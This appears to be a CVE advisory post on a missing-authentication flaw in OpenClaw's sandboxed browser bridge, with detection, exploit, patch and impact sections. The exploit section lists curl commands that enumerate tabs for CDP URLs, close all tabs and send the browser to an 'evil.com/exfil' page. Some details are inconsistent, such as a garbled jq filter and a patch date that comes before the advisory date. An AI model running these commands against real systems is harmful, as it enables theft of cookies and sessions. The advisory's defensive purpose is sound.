OpenClaw (npm), Missing Authentication, CVE-2026-XXXX (High)

Listen to this Post

The vulnerability exists because when the sandboxed browser feature is enabled, openclaw starts a local HTTP bridge server bound to loopback (localhost) without enabling authentication. This server exposes sensitive browser control endpoints like /profiles, /tabs, and /agent/. Due to missing authentication wiring in the sandbox initialization path, any local process on the machine can send requests to these endpoints. A local attacker can enumerate open tabs to retrieve Chrome DevTools Protocol (CDP) WebSocket URLs, then use those to open, close, or navigate tabs. More critically, the attacker can execute arbitrary JavaScript in the context of open pages via CDP, allowing exfiltration of cookies, session data, and page contents from authenticated sessions. This exposure is limited to localhost (CVSS AV:L) but provides full compromise of any browser session running in the sandbox. The issue was introduced in the first npm release that shipped the sandbox browser bridge and affects all versions until the patch.
Platform: OpenClaw (npm)
Version: 2026.1.29-beta.1
Vulnerability: Missing Authentication
Severity: High
Date: 2026-02-18

Prediction: Patched 2026-02-14

What Undercode Say:

Analytics

Check installed OpenClaw version
openclaw --version
Check if sandbox browser bridge port is listening (default dynamic, find it)
ss -tlnp | grep openclaw
Test if bridge port requires authentication (should return 401 after patch)
curl -v http://localhost:PORT/profiles
Check config for sandbox browser setting
grep -A 2 "sandbox.browser" ~/.openclaw/config.yaml
Monitor logs for unauthenticated bridge access attempts
tail -f ~/.openclaw/logs/sandbox-bridge.log | grep "WARN|unauthorized"

Exploit

Local attacker enumerates open tabs via unauthenticated bridge
curl -s http://localhost:PORT/tabs | jq '.[] | {id: .id, url: .url, cdpUrl: .cdpWebSocketUrl}'
Use extracted CDP URL to execute JavaScript in page context
WEBSOCKET_URL=$(curl -s http://localhost:PORT/tabs | jq -r '.[bash].cdpWebSocketUrl')
Connect to CDP and execute JavaScript to steal cookies
(Full CDP exploitation requires WebSocket client)
Navigate browser to attacker-controlled page
curl -X POST http://localhost:PORT/tabs/open -H "Content-Type: application/json" -d '{"url": "https://evil.com/exfil"}'
Close all tabs
curl -X DELETE http://localhost:PORT/tabs

Protection

Upgrade to patched version (recommended)
npm install -g [email protected]
Or disable sandboxed browser feature
openclaw config set agents.defaults.sandbox.browser.enabled false
After upgrade, verify auth is enforced (expect 401)
curl -f http://localhost:PORT/profiles || echo "Auth enforced"
Restart service
systemctl --user restart openclaw-gateway
Monitor for any existing compromise
grep -r "CDP|sandbox-bridge" ~/.openclaw/logs/ | grep -B 5 -A 5 "$(date -d '7 days ago' +%Y-%m-%d)"

Impact

A local attacker with ability to execute arbitrary processes can fully compromise all browser sessions running in OpenClaw’s sandbox. This enables theft of cookies, session tokens, and page contents from authenticated web applications. The attacker can also manipulate browser behavior by opening malicious pages or closing legitimate ones. Since this runs on localhost, it bypasses network firewalls but any malicious process or compromised application on the same machine can exploit it. The vulnerability effectively nullifies the security isolation that the sandbox was designed to provide.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top